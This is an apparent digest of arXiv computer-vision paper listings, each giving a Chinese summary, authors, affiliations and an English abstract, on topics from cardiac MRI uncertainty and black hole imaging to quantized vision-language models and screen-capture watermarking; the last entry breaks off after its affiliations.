【Quick Read】: This paper addresses the fact that deep learning (DL) methods for cardiac functional biomarker estimation are typically assessed only for accuracy, overlooking precision. The key is to apply uncertainty estimation techniques, namely deep ensembles, test-time augmentation, and Monte Carlo dropout, to a state-of-the-art pipeline, and to propose new distribution-based metrics for assessing scan-rescan agreement of biomarkers. The results show that although point-estimate performance is high (average Dice 87%), distributional analysis reveals that the scan/rescan confidence-interval overlap reaches 50% in fewer than 45% of cases, and statistical similarity tests find significant scan-rescan differences in over 65% of cases, indicating that point estimates alone overstate performance and that more representative distribution-level metrics are needed to characterize precision.
Link: https://arxiv.org/abs/2603.26789
Authors: Dewmini Hasara Wickremasinghe, Michelle Gibogwe, Andrew Bell, Esther Puyol-Antón, Muhummad Sohaib Nazir, Reza Razavi, Bruno Paun, Paul Aljabar, Andrew P. King
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:The performance of deep learning (DL) methods for the analysis of cine cardiovascular magnetic resonance (CMR) is typically assessed in terms of accuracy, overlooking precision. In this work, uncertainty estimation techniques, namely deep ensemble, test-time augmentation, and Monte Carlo dropout, are applied to a state-of-the-art DL pipeline for cardiac functional biomarker estimation, and new distribution-based metrics are proposed for the assessment of biomarker precision. The model achieved high accuracy (average Dice 87%) and point estimate precision on two external validation scan-rescan CMR datasets. However, distribution-based metrics showed that the overlap between scan/rescan confidence intervals was 50% in less than 45% of the cases. Statistical similarity tests between scan and rescan biomarkers also resulted in significant differences for over 65% of the cases. We conclude that, while point estimate metrics might suggest good performance, distributional analyses reveal lower precision, highlighting the need to use more representative metrics to assess scan-rescan agreement.
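One way to operationalize scan-rescan agreement of confidence intervals is an interval-overlap fraction. The sketch below uses a plausible definition and made-up ejection-fraction intervals; the paper's actual distribution-based metrics may be defined differently:

```python
import numpy as np

def interval_overlap(a, b):
    """Fraction of the shorter confidence interval covered by the other.

    a, b: (low, high) tuples for scan and rescan biomarker estimates.
    Returns a value in [0, 1]. An illustrative overlap definition.
    """
    lo = max(a[0], b[0])
    hi = min(a[1], b[1])
    inter = max(0.0, hi - lo)
    shorter = min(a[1] - a[0], b[1] - b[0])
    return inter / shorter if shorter > 0 else 0.0

# Hypothetical ejection-fraction CIs (%) for three scan/rescan pairs.
scan = [(55.0, 61.0), (48.0, 52.0), (60.0, 66.0)]
rescan = [(58.0, 64.0), (53.0, 57.0), (61.0, 65.0)]
overlaps = [interval_overlap(s, r) for s, r in zip(scan, rescan)]
frac_above_half = np.mean([o >= 0.5 for o in overlaps])  # share of well-agreeing pairs
```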
[CV-265] ReMemNav: A Rethinking and Memory-Augmented Framework for Zero-Shot Object Navigation
【Quick Read】: This paper addresses the core challenge of zero-shot object navigation: locating unseen target objects in unfamiliar environments without prior maps or task-specific training. Current approaches based on vision-language models (VLMs) still suffer from spatial hallucinations, local exploration deadlocks, and a disconnect between high-level semantic intent and low-level control. The key innovations of the proposed hierarchical framework, ReMemNav, are: introducing the Recognize Anything Model (RAM) to anchor the VLM's spatial reasoning; an adaptive dual-modal rethinking mechanism built on an episodic semantic buffer queue, which actively verifies target visibility and uses historical memory to correct decisions and avoid deadlocks; and extracting feasible action sequences from depth masks so the VLM can select the optimal action to map into actual spatial movement, yielding clear gains in success rate (SR) and path-length-normalized success (SPL).
Link: https://arxiv.org/abs/2603.26788
Authors: Feng Wu, Wei Zuo, Wenliang Yang, Jun Xiao, Yang Liu, Xinhua Zeng
Affiliations: Fudan University; Tongji University
Subjects: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
Comments: 8 pages, 5 figures
Abstract:Zero-shot object navigation requires agents to locate unseen target objects in unfamiliar environments without prior maps or task-specific training which remains a significant challenge. Although recent advancements in vision-language models(VLMs) provide promising commonsense reasoning capabilities for this task, these models still suffer from spatial hallucinations, local exploration deadlocks, and a disconnect between high-level semantic intent and low-level control. In this regard, we propose a novel hierarchical navigation framework named ReMemNav, which seamlessly integrates panoramic semantic priors and episodic memory with VLMs. We introduce the Recognize Anything Model to anchor the spatial reasoning process of the VLM. We also design an adaptive dual-modal rethinking mechanism based on an episodic semantic buffer queue. The proposed mechanism actively verifies target visibility and corrects decisions using historical memory to prevent deadlocks. For low-level action execution, ReMemNav extracts a sequence of feasible actions using depth masks, allowing the VLM to select the optimal action for mapping into actual spatial movement. Extensive evaluations on HM3D and MP3D demonstrate that ReMemNav outperforms existing training-free zero-shot baselines in both success rate and exploration efficiency. Specifically, we achieve significant absolute performance improvements, with SR and SPL increasing by 1.7% and 7.0% on HM3D v0.1, 18.2% and 11.1% on HM3D v0.2, and 8.7% and 7.9% on MP3D.
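The episodic semantic buffer queue can be pictured as a fixed-size memory with a revisit check that triggers rethinking. The class below is a hypothetical sketch of that idea, not ReMemNav's implementation; the buffer size, threshold, and label scheme are invented:

```python
from collections import Counter, deque

class EpisodicBuffer:
    """Fixed-size memory of recent semantic observations with a revisit check.

    Deadlock heuristic: if one location label dominates recent memory,
    the agent is likely looping and should trigger a "rethink" step.
    """
    def __init__(self, maxlen=8, revisit_ratio=0.5):
        self.buf = deque(maxlen=maxlen)
        self.revisit_ratio = revisit_ratio

    def push(self, label):
        self.buf.append(label)

    def should_rethink(self):
        if len(self.buf) < self.buf.maxlen:
            return False  # not enough history yet
        _, count = Counter(self.buf).most_common(1)[0]
        return count / len(self.buf) >= self.revisit_ratio

mem = EpisodicBuffer(maxlen=4)
for obs in ["hallway", "kitchen", "hallway", "hallway"]:
    mem.push(obs)
stuck = mem.should_rethink()       # "hallway" fills 3/4 of memory -> rethink

fresh = EpisodicBuffer(maxlen=4)   # empty memory -> no rethink yet
not_stuck = fresh.should_rethink()
```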
[CV-266] Brain-Inspired Multimodal Spiking Neural Network for Image-Text Retrieval
【Quick Read】: This paper tackles the challenge of building low-power, high-performance spiking neural networks (SNNs) for multimodal applications, in particular image-text retrieval (ITR), where existing methods based on artificial neural networks (ANNs) often chase unimodal semantic richness while neglecting cross-modal interaction, retrieval latency, and energy efficiency. The key is the proposed brain-inspired Cross-Modal Spike Fusion network (CMSF), which fuses the two modalities directly at the spike level: the enhanced multimodal representations serve as soft supervisory signals to refine the unimodal spike embeddings and mitigate semantic loss. With only two time steps, CMSF achieves top-tier retrieval accuracy, surpassing state-of-the-art ANN counterparts while retaining exceptionally low energy consumption and high retrieval speed.
Link: https://arxiv.org/abs/2603.26787
Authors: Xintao Zong, Xian Zhong, Wenxuan Liu, Jianhao Ding, Zhaofei Yu, Tiejun Huang
Affiliations: Wuhan University of Technology; Peking University
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Spiking neural networks (SNNs) have recently shown strong potential in unimodal visual and textual tasks, yet building a directly trained, low-energy, and high-performance SNN for multimodal applications such as image-text retrieval (ITR) remains highly challenging. Existing artificial neural network (ANN)-based methods often pursue richer unimodal semantics using deeper and more complex architectures, while overlooking cross-modal interaction, retrieval latency, and energy efficiency. To address these limitations, we present a brain-inspired Cross-Modal Spike Fusion network (CMSF) and apply it to ITR for the first time. The proposed spike fusion mechanism integrates unimodal features at the spike level, generating enhanced multimodal representations that act as soft supervisory signals to refine unimodal spike embeddings, effectively mitigating semantic loss within CMSF. Despite requiring only two time steps, CMSF achieves top-tier retrieval accuracy, surpassing state-of-the-art ANN counterparts while maintaining exceptionally low energy consumption and high retrieval speed. This work marks a significant step toward multimodal SNNs, offering a brain-inspired framework that unifies temporal dynamics with cross-modal alignment and provides new insights for future spiking-based multimodal research. The code is available at this https URL.
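As background for spike-level fusion, the discrete leaky integrate-and-fire (LIF) dynamics underlying most SNNs can be simulated in a few lines. This is a generic LIF sketch with illustrative parameters; CMSF's neuron model and fusion operator are not specified here, and the OR-style fusion at the end is an assumption for illustration:

```python
import numpy as np

def lif_spikes(currents, tau=2.0, v_th=1.0):
    """Leaky integrate-and-fire dynamics over T time steps.

    currents: (T, N) input currents; returns binary spike trains (T, N).
    Membrane potential leaks by 1/tau per step, fires at v_th, then hard-resets.
    """
    T, N = currents.shape
    v = np.zeros(N)
    spikes = np.zeros((T, N))
    for t in range(T):
        v = v * (1.0 - 1.0 / tau) + currents[t]
        fired = v >= v_th
        spikes[t] = fired.astype(float)
        v = np.where(fired, 0.0, v)  # hard reset after a spike
    return spikes

# Two time steps (as used by CMSF) over four hypothetical neurons.
I = np.array([[1.2, 0.4, 0.9, 0.0],
              [0.1, 0.8, 0.9, 0.0]])
s = lif_spikes(I)
# Spike-level fusion of two unimodal trains, sketched as an elementwise OR.
fused = np.maximum(s, lif_spikes(I[:, ::-1]))
```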
[CV-267] HighlightBench: Benchmarking Markup-Driven Table Reasoning in Scientific Documents
【Quick Read】: This paper addresses the limited ability of multimodal large language models (MLLMs) to treat visual markups in table-centric documents (highlights, underlines, bold text, etc.) as explicit logical directives. Existing evaluations cannot distinguish whether a model fails to see the markup, or sees it but fails to incorporate it into symbolic reasoning, leaving a blind spot in assessing markup-driven table understanding. The key is HighlightBench, a diagnostic benchmark that decomposes evaluation into five task families: Markup Grounding, Constrained Retrieval, Local Relations, Aggregation & Comparison, and Consistency & Missingness. It is accompanied by a reference pipeline that makes intermediate decisions explicit, enabling reproducible baselines and error attribution along the perception-to-execution chain.
Link: https://arxiv.org/abs/2603.26784
Authors: Lexin Wang, Shenghua Liu, Yiwei Wang, Yujun Cai, Yuyao Ge, Jiayu Yao, Jiafeng Guo, Xueqi Cheng
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Visual markups such as highlights, underlines, and bold text are common in table-centric documents. Although multimodal large language models (MLLMs) have made substantial progress in document understanding, their ability to treat such cues as explicit logical directives remains under-explored. More importantly, existing evaluations cannot distinguish whether a model fails to see the markup or fails to reason with it. This creates a key blind spot in assessing markup-conditioned behavior over tables. To address this gap, we introduce HighlightBench, a diagnostic benchmark for markup-driven table understanding that decomposes evaluation into five task families: Markup Grounding, Constrained Retrieval, Local Relations, Aggregation & Comparison, and Consistency & Missingness. We further provide a reference pipeline that makes intermediate decisions explicit, enabling reproducible baselines and finer-grained attribution of errors along the perception-to-execution chain. Experiments show that even strong models remain unstable when visual cues must be consistently aligned with symbolic reasoning under structured output constraints.
[CV-268] Can We Change the Stroke Size for Easier Diffusion?
【Quick Read】: This paper addresses the limitation of diffusion models in the low signal-to-noise regime, where pixel-level predictions must be made despite heavy noise and learning becomes difficult. The key is to introduce stroke-size control as a controlled intervention that changes the effective roughness of the supervised target, the predictions, and the perturbations across timesteps, thereby easing the low signal-to-noise challenge; the advantages and trade-offs of the intervention are analyzed both theoretically and empirically.
Link: https://arxiv.org/abs/2603.26783
Authors: Yunwei Bai, Ying Kiat Tan, Yao Shu, Tsuhan Chen
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments:
Abstract:Diffusion models can be challenged in the low signal-to-noise regime, where they have to make pixel-level predictions despite the presence of high noise. The geometric intuition is akin to using the finest stroke for oil painting throughout, which may be ineffective. We therefore study stroke-size control as a controlled intervention that changes the effective roughness of the supervised target, predictions and perturbations across timesteps, in an attempt to ease the low signal-to-noise challenge. We analyze the advantages and trade-offs of the intervention both theoretically and empirically. Code will be released.
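The low signal-to-noise regime can be made concrete with a toy schedule. Assuming the linear interpolation x_t = (1 - t)·x + t·ε (an illustrative choice, not necessarily the paper's forward process), the SNR collapses as t approaches 1:

```python
import numpy as np

def snr(t):
    """Signal-to-noise ratio of the interpolation x_t = (1 - t) * x + t * eps.

    SNR(t) = ((1 - t) / t)^2. Illustrative schedule for intuition only.
    """
    return ((1.0 - t) / t) ** 2

ts = np.array([0.1, 0.25, 0.5, 0.75, 0.9])
snrs = snr(ts)
# Near t -> 1 the model must predict pixels from mostly noise; this is the
# regime where coarsening the effective "stroke size" could help.
low_snr_steps = ts[snrs < 0.5]   # the 0.75 and 0.9 timesteps
```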
[CV-269] RatSeizure: A Benchmark and Saliency-Context Transformer for Rat Seizure Localization
【Quick Read】: This paper addresses the lack of publicly available datasets with precise temporal annotations and standardized evaluation protocols for animal-model (especially rat) seizure research into epileptogenesis and treatment response; existing animal behavior datasets suffer from limited accessibility, coarse labels, and insufficient temporal localization of clinically meaningful events. The key contributions are RatSeizure, the first public benchmark for fine-grained seizure behavior analysis, consisting of video clips annotated with seizure-related action units and temporal boundaries to support both behavior classification and temporal localization; and RaSeformer, an attention-based saliency-context Transformer for temporal action localization that highlights behavior-relevant context while suppressing redundant cues. Experiments on RatSeizure show strong performance, providing a competitive reference model for this challenging task, alongside standardized splits and evaluation protocols for reproducible benchmarking.
Link: https://arxiv.org/abs/2603.26780
Authors: Ting Yu Tsai, An Yu, Lucy Lee, Felix X.-F. Ye, Damian S. Shin, Tzu-Jen Kao, Xin Li, Ming-Ching Chang
Affiliations: University at Albany, SUNY; University of Louisville; GE HealthCare
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Animal models, particularly rats, play a critical role in seizure research for studying epileptogenesis and treatment response. However, progress is limited by the lack of datasets with precise temporal annotations and standardized evaluation protocols. Existing animal behavior datasets often have limited accessibility, coarse labeling, and insufficient temporal localization of clinically meaningful events. To address these limitations, we introduce RatSeizure, the first publicly benchmark for fine-grained seizure behavior analysis. The dataset consists of recorded clips annotated with seizure-related action units and temporal boundaries, enabling both behavior classification and temporal localization. We further propose RaSeformer, a saliency-context Transformer for temporal action localization that highlights behavior-relevant context while suppressing redundant cues. Experiments on RatSeizure show that RaSeformer achieves strong performance and provides a competitive reference model for this challenging task. We also establish standardized dataset splits and evaluation protocols to support reproducible benchmarking.
[CV-270] Limits of Imagery Reasoning in Frontier LLM Models
【Quick Read】: This paper investigates why large language models (LLMs) perform poorly on spatial reasoning tasks that require mental simulation, such as mental rotation. The key idea is to equip an LLM with an external "Imagery Module" capable of rendering and rotating 3D models, acting as a cognitive prosthetic: in a dual-module architecture, a reasoning module (an MLLM) interacts with the imagery module, outsourcing the maintenance and manipulation of 3D state. Results show the system still underperforms (at most 62.5% accuracy), revealing that frontier LLMs lack foundational visual-spatial primitives, including low-level sensitivity to spatial signals (depth, motion, and short-horizon dynamic prediction) and the capacity to reason contemplatively over images, dynamically shift visual focus, and integrate imagery with symbolic information.
Link: https://arxiv.org/abs/2603.26779
Authors: Sergio Y. Hayashi, Nina S. T. Hirata
Affiliations: Institute of Mathematics and Statistics, University of São Paulo
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments: 25 pages
Abstract:Large Language Models (LLMs) have demonstrated impressive reasoning capabilities, yet they struggle with spatial tasks that require mental simulation, such as mental rotation. This paper investigates whether equipping an LLM with an external "Imagery Module" -- a tool capable of rendering and rotating 3D models -- can bridge this gap, functioning as a "cognitive prosthetic." We conducted experiments using a dual-module architecture in which a reasoning module (an MLLM) interacts with an imagery module on 3D model rotation tasks. Performance was lower than expected, with accuracy reaching at most 62.5%. Further investigation suggests that even when the burden of maintaining and manipulating a holistic 3D state is outsourced, the system still fails. This reveals that current frontier models lack the foundational visual-spatial primitives required to interface with imagery. Specifically, they lack: (1) the low-level sensitivity to extract spatial signals such as (a) depth, (b) motion, and (c) short-horizon dynamic prediction; and (2) the capacity to reason contemplatively over images, dynamically shifting visual focus and balancing imagery with symbolic and associative information.
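The kind of operation such an imagery module outsources is elementary linear algebra once the 3D state is explicit. A minimal sketch of rotating a point set (illustrative code, not the paper's module):

```python
import numpy as np

def rotation_z(theta):
    """Rotation matrix about the z-axis, angle in radians."""
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[c, -s, 0.0], [s, c, 0.0], [0.0, 0.0, 1.0]])

# Vertices of a unit cube -- the "holistic 3D state" the imagery module
# maintains so the reasoning module does not have to.
cube = np.array([[x, y, z] for x in (0, 1) for y in (0, 1) for z in (0, 1)],
                dtype=float)
rotated = cube @ rotation_z(np.pi / 2).T                 # rotate all vertices 90 degrees
v = rotation_z(np.pi / 2) @ np.array([1.0, 0.0, 0.0])    # x-axis maps to y-axis
```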
[CV-271] BHCast: Unlocking Black Hole Plasma Dynamics from a Single Blurry Image with Long-Term Forecasting CVPR2026
【Quick Read】: This paper addresses the problem of inferring black hole properties and the dynamics of the surrounding accretion plasma from resolution-limited observations, such as the blurry images captured by the Event Horizon Telescope (EHT); numerical simulations provide accurate dynamics but are too costly for real-time inference, creating a bottleneck. The key is the BHCast framework, whose core neural model transforms a single blurry snapshot into forecasted future high-resolution frames: a multi-scale pyramid loss lets autoregressive forecasting simultaneously super-resolve and evolve the frame into a coherent movie that stays stable over long horizons. Gradient-boosting trees then recover black hole properties (spin and viewing inclination) from extracted spatio-temporal features such as pattern speed and pitch angle, yielding a modular, interpretable approach to the inverse problem with robust uncertainty quantification.
Link: https://arxiv.org/abs/2603.26777
Authors: Renbo Tu, Ali SaraerToosi, Nicholas S. Conroy, Gennady Pekhimenko, Aviad Levis
Affiliations: University of Toronto; Vector Institute; University of Illinois at Urbana-Champaign; NVIDIA
Subjects: Computer Vision and Pattern Recognition (cs.CV); Instrumentation and Methods for Astrophysics (astro-ph.IM); Machine Learning (cs.LG)
Comments: CVPR 2026
Abstract:The Event Horizon Telescope (EHT) delivered the first image of a black hole by capturing the light from its surrounding accretion flow, revealing structure but not dynamics. Simulations of black hole accretion dynamics are essential for interpreting EHT images but costly to generate and impractical for inference. Motivated by this bottleneck, BHCast presents a framework for forecasting black hole plasma dynamics from a single, blurry snapshot, such as those captured by the EHT. At its core, BHCast is a neural model that transforms a static image into forecasted future frames, revealing the underlying dynamics hidden within one snapshot. With a multi-scale pyramid loss, we demonstrate how autoregressive forecasting can simultaneously super-resolve and evolve a blurry frame into a coherent, high-resolution movie that remains stable over long time horizons. From forecasted dynamics, we can then extract interpretable spatio-temporal features, such as pattern speed (rotation rate) and pitch angle. Finally, BHCast uses gradient-boosting trees to recover black hole properties from these plasma features, including the spin and viewing inclination angle. The separation between forecasting and inference provides modular flexibility, interpretability, and robust uncertainty quantification. We demonstrate the effectiveness of BHCast on simulations of two distinct black hole accretion systems, Sagittarius A* and M87*, by testing on simulated frames blurred to EHT resolution and real EHT images of M87*. Ultimately, our methodology establishes a scalable paradigm for solving inverse problems, demonstrating the potential of learned dynamics to unlock insights from resolution-limited scientific data.
[CV-272] From Prediction to Diagnosis: Reasoning-Aware AI for Photovoltaic Defect Inspection
【Quick Read】: This paper addresses the lack of interpretability and diagnostic depth in existing computer vision systems for photovoltaic defect identification, which limits their trustworthy deployment on high-stakes energy infrastructure. The key is the REVL-PV framework, which performs multimodal learning over electroluminescence, thermal, and visible-light imagery and requires the model to link visual evidence to plausible defect mechanisms before classification, producing structured diagnostic reports aligned with professional photovoltaic inspection practice. This reasoning-aware multimodal learning paradigm improves accuracy (93% classification accuracy) and robustness while achieving strong semantic alignment with the assessments of a certified inspection expert.
Link: https://arxiv.org/abs/2603.26776
Authors: Dev Mistry, Feng Qiu, Bo Chen, Feng Liu, Can Chen, Mohammad Shahidehpour, Ren Wang
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: 34 pages, 5 figures
Abstract:Reliable photovoltaic defect identification is essential for maintaining energy yield, ensuring warranty compliance, and enabling scalable inspection of rapidly expanding solar fleets. Although recent advances in computer vision have improved automated defect detection, most existing systems operate as opaque classifiers that provide limited diagnostic insight for high-stakes energy infrastructure. Here we introduce REVL-PV, a vision-language framework that embeds domain-specific diagnostic reasoning into multimodal learning across electroluminescence, thermal, and visible-light imagery. By requiring the model to link visual evidence to plausible defect mechanisms before classification, the framework produces structured diagnostic reports aligned with professional photovoltaic inspection practice. Evaluated on 1,927 real-world modules spanning eight defect categories, REVL-PV achieves 93% classification accuracy while producing interpretable diagnostic rationales and maintaining strong robustness under realistic image corruptions. A blind concordance study with a certified solar inspection expert shows strong semantic alignment between model explanations and expert assessments across defect identification, root-cause attribution, and visual descriptions. These results demonstrate that reasoning-aware multimodal learning establishes a general paradigm for trustworthy AI-assisted inspection of photovoltaic energy infrastructure.
[CV-273] From Content to Audience: A Multimodal Annotation Framework for Broadcast Television Analytics
【Quick Read】: This paper addresses the difficulty of automated semantic annotation of broadcast television news content, which combines structured audiovisual composition, domain-specific editorial patterns, and strict operational constraints. The key is a domain-specific benchmark for Italian broadcast news and a systematic evaluation of two pipeline architectures across nine frontier multimodal large language models (MLLMs), under progressively enriched input strategies (visual signals, automatic speech recognition, speaker diarization, and metadata). Experiments show that gains from video input are strongly model-dependent: larger models exploit temporal continuity effectively, while smaller models degrade under extended multimodal context, likely due to token overload. The selected best pipeline is then deployed on 14 full broadcast episodes, integrating minute-level annotations with normalized audience measurement data and demonstrating the framework's operational viability for content-based audience analytics.
Link: https://arxiv.org/abs/2603.26772
Authors: Paolo Cupini, Francesco Pierri
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
Comments:
Abstract:Automated semantic annotation of broadcast television content presents distinctive challenges, combining structured audiovisual composition, domain-specific editorial patterns, and strict operational constraints. While multimodal large language models (MLLMs) have demonstrated strong general-purpose video understanding capabilities, their comparative effectiveness across pipeline architectures and input configurations in broadcast-specific settings remains empirically undercharacterized. This paper presents a systematic evaluation of multimodal annotation pipelines applied to broadcast television news in the Italian setting. We construct a domain-specific benchmark of clips labeled across four semantic dimensions: visual environment classification, topic classification, sensitive content detection, and named entity recognition. Two different pipeline architectures are evaluated across nine frontier models, including Gemini 3.0 Pro, LLaMA 4 Maverick, Qwen-VL variants, and Gemma 3, under progressively enriched input strategies combining visual signals, automatic speech recognition, speaker diarization, and metadata. Experimental results demonstrate that gains from video input are strongly model-dependent: larger models effectively leverage temporal continuity, while smaller models show performance degradation under extended multimodal context, likely due to token overload. Beyond benchmarking, the selected pipeline is deployed on 14 full broadcast episodes, with minute-level annotations integrated with normalized audience measurement data provided by an Italian media company. This integration enables correlational analysis of topic-level audience sensitivity and generational engagement divergence, demonstrating the operational viability of the proposed framework for content-based audience analytics.
[CV-274] Quantized Vision-Language Models for Damage Assessment: A Comparative Study of LLaVA-1.5-7B Quantization Levels
【速读】: This paper addresses the inefficiency and high cost of manual inspection in automated bridge-infrastructure damage assessment; the core challenge is efficient deployment on consumer-grade GPUs while preserving damage-description quality. The key to the solution is an end-to-end quantized vision-language model (VLM) pipeline that uses LLaVA-1.5-7B for visual damage analysis and structured JSON extraction, together with a rule-based priority-scoring mechanism. A systematic comparison of three quantization levels (Q4_K_M, Q5_K_M, and Q8_0) on 254 rebar-exposure images shows that Q5_K_M strikes the best balance between quality metrics such as damage-type recognition and severity classification (mean 3.18/5.0) and inference efficiency (5.67 s/image): 8.5% higher quality than Q4_K_M at only a 4.5% speed cost, while matching Q8_0's quality with 25% faster inference, and exhibiting the weakest text-quality correlation (-0.148), indicating stable performance regardless of description length.
链接: https://arxiv.org/abs/2603.26770
作者: Takato Yasuno
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 16 pages, 4 figures, 8 tables
Abstract:Bridge infrastructure inspection is a critical but labor-intensive task requiring expert assessment of structural damage such as rebar exposure, cracking, and corrosion. This paper presents a comprehensive study of quantized Vision-Language Models (VLMs) for automated bridge damage assessment, focusing on the trade-offs between description quality, inference speed, and resource requirements. We develop an end-to-end pipeline combining LLaVA-1.5-7B for visual damage analysis, structured JSON extraction, and rule-based priority scoring. To enable deployment on consumer-grade GPUs, we conduct a systematic comparison of three quantization levels: Q4_K_M, Q5_K_M, and Q8_0 across 254 rebar exposure images. We introduce a 5-point quality evaluation framework assessing damage type recognition and severity classification. Our results demonstrate that Q5_K_M achieves the optimal balance: quality score 3.18 \pm 1.35/5.0, inference time 5.67s/image, and 0.56 quality/sec efficiency, giving 8.5% higher quality than Q4_K_M with only a 4.5% speed reduction, while matching Q8_0's quality with 25% faster inference. Statistical analysis reveals that Q5_K_M exhibits the weakest text-quality correlation (-0.148), indicating consistent performance regardless of description length.
[CV-275] Edge Reliability Gap in Vision-Language Models: Quantifying Failure Modes of Compressed VLMs Under Visual Corruption
【速读】: This paper studies how compression changes the failure modes of large vision-language models (VLMs) at the edge, i.e., whether compact models merely fail more often or fail in different ways. Comparing a quantized 7B model (Qwen2.5-VL-7B, 4-bit NF4) with a 500M FP16 model (SmolVLM2-500M) on 4,000 samples from VQAv2 and COCO Captions, the study proposes a three-category diagnostic error taxonomy (Object Blindness, Semantic Drift, Prior Bias) and evaluates the models with a text-only judge (GPT-4o), confidence calibration via Expected Calibration Error (ECE), structured negation probes, and a blur-robustness experiment. The key finding is that the compact model exhibits a qualitatively distinct failure signature: notably a significantly larger negation collapse (-33.2pp vs. -20.8pp), concentrated on COCO, with a 100% error rate on the false_yn template versus 14% for the Qwen model. This indicates that compression not only affects performance but introduces new, predictable error patterns, which matters for safety auditing before edge deployment.
链接: https://arxiv.org/abs/2603.26769
作者: Mehmet Kaan Erol
机构: Marmara University, Institute of Pure and Applied Sciences (马尔马拉大学纯与应用科学研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 16 pages, 5 figures
Abstract:The rapid compression of large vision-language models (VLMs) for edge deployment raises an underexplored question: do compact models fail differently, not merely more often? This study compares a 7-billion-parameter quantised VLM (Qwen2.5-VL-7B, 4-bit NF4) against a 500-million-parameter FP16 model (SmolVLM2-500M) across 4,000 samples from VQAv2 and COCO Captions. A three-category error taxonomy (Object Blindness, Semantic Drift, Prior Bias) is applied as a diagnostic framework. A text-only GPT-4o judge reveals Semantic Drift (B) as the dominant failure mode on VQAv2 and on COCO for Qwen, with a mixed Object Blindness / Semantic Drift profile for SmolVLM2 on COCO; Prior Bias (C) is present on VQAv2 but absent on COCO for both models. Confidence calibration is measured via Expected Calibration Error (ECE) using geometric mean token probability, compositional reasoning is probed with structured negation probes across four templates, and a blur robustness experiment completes the evaluation. For this model pair, the compact model exhibits a qualitatively distinct failure signature: a 12.5pp larger negation collapse (-33.2pp vs. -20.8pp, Wald 95% CI [8.2, 16.8]pp, p < 10^-8), driven almost entirely by COCO while the VQAv2 gap is not statistically significant (4.5pp, p=0.19). The most discriminating template is false_yn: SmolVLM2-500M responds “Yes” (incorrectly claiming a depicted object is absent) on 100% of COCO trials vs. 14% for Qwen2.5-VL-7B. Asymmetric dataset-dependent miscalibration and a blur experiment with two controlled ablations complete the analysis. The fully reproducible pipeline is released for systematic safety auditing of compressed VLMs prior to edge deployment.
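As a concrete illustration of the calibration metric used above, the following sketch computes an answer-level confidence as the geometric mean of per-token probabilities and the standard binned ECE. This is a minimal reimplementation of the textbook definitions, not the paper's released pipeline; the function names and 10-bin default are illustrative choices.

```python
import math

def sequence_confidence(token_probs):
    """Geometric mean of per-token probabilities, used as answer-level confidence."""
    log_sum = sum(math.log(p) for p in token_probs)
    return math.exp(log_sum / len(token_probs))

def expected_calibration_error(confidences, correct, n_bins=10):
    """Binned ECE: weighted mean |accuracy - confidence| over confidence bins."""
    bins = [[] for _ in range(n_bins)]
    for c, ok in zip(confidences, correct):
        idx = min(int(c * n_bins), n_bins - 1)  # clamp c == 1.0 into the last bin
        bins[idx].append((c, ok))
    n = len(confidences)
    ece = 0.0
    for b in bins:
        if not b:
            continue
        conf = sum(c for c, _ in b) / len(b)
        acc = sum(1 for _, ok in b if ok) / len(b)
        ece += (len(b) / n) * abs(acc - conf)
    return ece
```

A perfectly calibrated bin (e.g. 80% confidence with 80% accuracy) contributes zero, so ECE isolates the confidence-accuracy gap the paper measures.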
[CV-276] A training-free framework for high-fidelity appearance transfer via diffusion transformers
【速读】: This paper targets reference-image-based controllable editing with diffusion models, in particular the tendency of Diffusion Transformer (DiT) architectures to disrupt holistic scene structure when local appearance is injected. The key to the solution is the first training-free framework for high-fidelity appearance transfer, built as a synergistic system that disentangles structure and appearance: high-fidelity inversion first establishes a content prior for the source image (capturing its lighting and micro-textures), and a novel attention-sharing mechanism then dynamically fuses purified appearance features from the reference, guided by geometric priors, achieving precise appearance control without compromising structural integrity.
链接: https://arxiv.org/abs/2603.26767
作者: Shengrong Gu,Ye Wang,Song Wu,Rui Ma,Qian Wang,Lanjun Wang,Zili Yi
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Diffusion Transformers (DiTs) excel at generation, but their global self-attention makes controllable, reference-image-based editing a distinct challenge. Unlike U-Nets, naively injecting local appearance into a DiT can disrupt its holistic scene structure. We address this by proposing the first training-free framework specifically designed to tame DiTs for high-fidelity appearance transfer. Our core is a synergistic system that disentangles structure and appearance. We leverage high-fidelity inversion to establish a rich content prior for the source image, capturing its lighting and micro-textures. A novel attention-sharing mechanism then dynamically fuses purified appearance features from a reference, guided by geometric priors. Our unified approach operates at 1024px and outperforms specialized methods on tasks ranging from semantic attribute transfer to fine-grained material application. Extensive experiments confirm our state-of-the-art performance in both structural preservation and appearance fidelity.
[CV-277] JND-Guided Neural Watermarking with Spatial Transformer Decoding for Screen-Capture Robustness
【速读】: This paper tackles the difficulty of achieving both high extraction accuracy and good visual quality in screen-shooting robust watermarking, where the display-and-recapture pipeline introduces severe, entangled degradations such as Moiré patterns, color-gamut shifts, perspective distortion, and sensor noise. The key is an end-to-end deep learning framework with three innovations: (i) a comprehensive noise-simulation layer that physically models realistic screen-shooting distortions, notably a Moiré pattern generator, so the network learns capture-channel-robust representations through adversarial training; (ii) a Just Noticeable Distortion (JND) perceptual loss that adaptively modulates embedding strength, concentrating watermark energy in perceptually insensitive regions to maximize visual quality; and (iii) two complementary automatic localization modules, a semantic-segmentation-based foreground extractor for image rectification and a symmetric noise-template mechanism for anti-cropping region recovery, enabling fully automated watermark decoding under realistic deployment conditions.
链接: https://arxiv.org/abs/2603.26766
作者: Jiayi Qin,Jingwei Li,Chuan Wu
机构: Zhejiang Gongshang University (浙江工商大学)
